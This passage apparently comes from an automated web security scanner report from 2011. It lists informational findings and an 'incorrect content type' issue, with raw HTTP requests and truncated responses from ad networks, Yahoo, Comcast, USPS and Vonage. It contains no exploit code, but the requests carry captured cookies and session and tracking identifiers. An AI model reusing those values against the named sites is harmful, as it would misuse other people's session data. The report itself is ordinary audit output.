Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:06 GMT
Server: Apache
Keep-Alive: timeout=60, max=400
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 24371


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
    <title>Today's Top 10 Bullish Stocks | E*TRADE Securities</title>
   
...[SNIP]...

24.24. http://view.atdmt.com/MDS/iview/346808775/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /MDS/iview/346808775/direct/01

Request

GET /MDS/iview/346808775/direct/01?time=1315313105.703304&click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTY2aDhvcChnaWQkY29weF9XS0lQRTdwQVJwalRsLndqUUo4TWhkN2FrNW1GZEVBQ0xfeixzdCQxMzE1MzEzMTA1Njg2MTQ1LHNpJDQ0NTc1NTEsdiQxLjAsYWlkJEtfejVZa1BEbUxBLSxjdCQyNSx5YngkaEpadGh3bG42Nzlna3FRMnIwNW02USxyJDAscmQkMTZpcnQybjg0KSk/1/*http://global.ard.yahoo.com/SIG=15j6kmdf5/M=999999.999999.999999.999999/D=sports/S=25664825:NT1/_ylt=ApiYATlqiMuuKIbliWocrTQ5nYcB/Y=YAHOO/EXP=1315320305/L=copx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z/B=K_z5YkPDmLA-/J=1315313105703304/K=r8awXcUkJHjbbi3QZybcoQ/A=3672360466282920027/R=0/X=6/* HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:08 GMT
Connection: close
Content-Length: 983

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/233570462/346808775/direct/01" onclick="(new Image).src='http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTY2aDhv
...[SNIP]...

24.25. http://view.atdmt.com/TR1/iview/332867993/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /TR1/iview/332867993/direct/01

Request

GET /TR1/iview/332867993/direct/01?time=1315313115&click=http://ads.bluelithium.com/clk?3,eAGlkEtvm0AUhf9MV5XLzDAzDAmaxfBweBhjHBybbCweDg7ggoHIpr--qK6t7ns255Ou7rm6B2EtQ.SDoYMCP57QQWW5hrCMDxlVkIpmUNM0mamEyQRBONt5G1PYxtIR-tlpN-KmrnXDvyiEL5w7QyFCYRqu8jX5H3lJf71P.8.N3H0cmg4Wt7Ria89XpaM.sk3rEkfhZSnHZLENSWDGgx.Na9-AJD754yLKyHuUV370dlq-LCv.sSj47DgM7TMARd2kSS0lXS6NybFppKw5gVfnhSN6VoqirA.A50xlKsYSIiqEmLAJ6CQZTYAYIzIDJu.bpht68MplqihElemzv7YMsB.rgYvyTTlXaZ.1QWevrzT2gvgTQvozznQQ81jYQQCs3YojjCiWIYYULHjWtNf91nNWFmvFui2jWrqUoav6x5wlFT3Nc0sYi.0voPN4311FrpvrsfgB3FvMlAUpQ1h9YsDjnZpcdtmmcu0yTT9x-D6mWRMCwRVCCcIErDkE37.da7l9808lvwEx7qgw, HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAHCNIABqIpUAAAAAAArpJQAAAAAAAAAMAIAAAAAAAA0AAQADCJ6uAQAAAAAAKasxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAMR19m7APwAAAAAAAAAAAADEdfZuwD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTzbx8WfquCrkAQGF3mkTKtl2.WiYSu9rp2McYAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15q6ggjle%2FM%3D787833.14800347.14555521.14177427%2FD%3Dsports%2FS%3D25664825%3AMREC%2F_ylt%3DAjV6qkbscsOrHRx5YKOYi005nYcB%2FY%3DYAHOO%2FEXP%3D1315320305%2FL%3Dcopx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z%2FB%3DY_rxAdBDRyg-%2FJ%3D1315313105713897%2FK%3Dr8awXcUkJHjbbi3QZybcoQ%2FA%3D6454134%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26S%3D14800347%26Z%3D300x100%26_PVID%3Dcopx%255fWKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL%255fz%26_salt%3D678154096%26cb%3D1315313105713897%26i%3D140509%26r%3D0%26ycg%3D%26yyob%3D%26zip%3D,10a407f8-d886-11e0-8bc2-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:15 GMT
Connection: close
Content-Length: 9420

<html><head><title>multipolicy_300x100</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...

24.26. http://view.atdmt.com/ULA/iview/351127232/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /ULA/iview/351127232/direct/01

Request

GET /ULA/iview/351127232/direct/01?time=0.6476867063902318&click=http://global.ard.yahoo.com/SIG=15ofquilq/M=801389.14847586.14590575.8842099/D=movies/S=7820639:LREC/_ylt=ArDkTjjTVQQGSE3cO1ppKBlfVXcA/Y=YAHOO/EXP=1315320297/L=6231TkWTWyDpARpjTl.wjQVUMhd7ak5mFckABi.p/B=xJy5EGKJiRw-/J=1315313097544579/K=3q_Pgfb1tF9EF5Bt89NjSg/A=6481381/R=0/* HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:00 GMT
Connection: close
Content-Length: 8264

<html><head><title>300x250_BTBS_Dante_Yh1k</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0p
...[SNIP]...

24.27. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /iaction/adoapn_AppNexusDemoActionTag_1

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:38 GMT
Connection: close
Content-Length: 349

<html><body><img src="http://spe.atdmt.com/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1314814617-3398750%7cMUI
...[SNIP]...

24.28. http://www.comcast.com/2go/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /2go/

Request

GET /2go/ HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; mbox=session#1315327839174-766376#1315331749|PC#1315327839174-766376.19#1316539489|check#true#1315329949; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331687930%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315331688369%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 01 Sep 2011 11:41:23 GMT
Accept-Ranges: bytes
ETag: "7f4d7139c68cc1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 12:24:52 GMT
Connection: close
Content-Length: 109

<html>
<head>
<meta http-equiv="refresh" content="0;url=default.ashx" />
</head>
<body>
</body>
</html>

24.29. http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pgatour.com
Path:   /.element/ssi/ads/2.0/gdyn_pgatour.html

Request

GET /.element/ssi/ads/2.0/gdyn_pgatour.html HTTP/1.1
Host: www.pgatour.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:26 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Tue, 06 Sep 2011 12:50:41 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 2364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>

...[SNIP]...

24.30. https://www.usps.com/tools/domesticratecalc/welcome.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /tools/domesticratecalc/welcome.htm

Request

GET /tools/domesticratecalc/welcome.htm?from=zclresults&page=ratecalc HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: http://zip4.usps.com/zip4/zcl_1_results.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331579861:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 494
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:05 GMT
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<!-- Send users to the new location. -->
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://postcalc.usps.gov/">
<META N
...[SNIP]...

24.31. http://www.vonage.com/googlesearch/get_results.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /googlesearch/get_results.php

Request

POST /googlesearch/get_results.php?mode=cluster&coutput=xml&client=external_test&q=xss&lang_cntry=en_us&refer=/ HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us
Content-Length: 0
Origin: http://www.vonage.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_cm=telephone%20serviceGooglewww.google.com; op471customerhomepagegum=a04v0e90o72796q0724o91744; op471customerhomepageliid=a04v0e90o72796q0724o91744; MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_nr=1315328340141-New; gpv_pageName=index_login; s_sq=%5B%5BB%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.3.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Length: 65
Content-Type: text/html

<?xml version="1.0"?>
<toplevel>
<t_fetch int="19"/>
</toplevel>

24.32. http://www.websitealive9.com/2140/Visitor/vTracker_v2.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.websitealive9.com
Path:   /2140/Visitor/vTracker_v2.asp

Request

GET /2140/Visitor/vTracker_v2.asp?websiteid=344&groupid=2140 HTTP/1.1
Host: www.websitealive9.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: no-store, must-revalidate, private
Pragma: no-cache
P3P: CP="NOI DSP COR CURa OUR NOR"
Content-Length: 8029
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Cache-control: private


var embed_departmentid = '0';


// keep on page
function URLEncode(plaintext)
{
   // The Javascript escape and unescape functions do not correspond
   // with what browsers actually do...
   va
...[SNIP]...

25. Content type incorrectly stated  previous  next
There are 59 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


25.1. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:18 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1471

   function wsod_image104() {
       document.write('<a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEz
...[SNIP]...

25.2. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs%3Dxss?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&click=http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1182

   function wsod_image68() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpAR
...[SNIP]...

25.3. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
